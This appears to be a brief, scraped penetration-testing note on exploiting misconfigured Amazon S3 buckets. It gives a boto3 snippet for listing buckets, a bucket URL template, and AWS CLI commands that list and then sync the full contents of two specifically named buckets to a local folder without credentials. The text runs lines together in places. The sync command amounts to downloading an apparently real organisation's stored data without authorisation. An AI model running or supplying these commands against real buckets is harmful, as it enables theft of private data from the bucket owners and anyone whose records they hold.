S3 Bucket Misconfiguration
S3 Bucket on misconfiguration and exploitation.
aws configureimport boto3
s3 = boto3.resource('s3')
for bucket in s3.buckets.all():
print(bucket.name)
https://s3.ap-south-1.amazonaws.com/$s3-bucketnameaws s3 ls s3://hicare/ --no-sign-request --region ap-south-1aws s3 sync s3://hicare-others/ ~/Documents/HiCare --no-sign-request --region ap-south-1
Last updated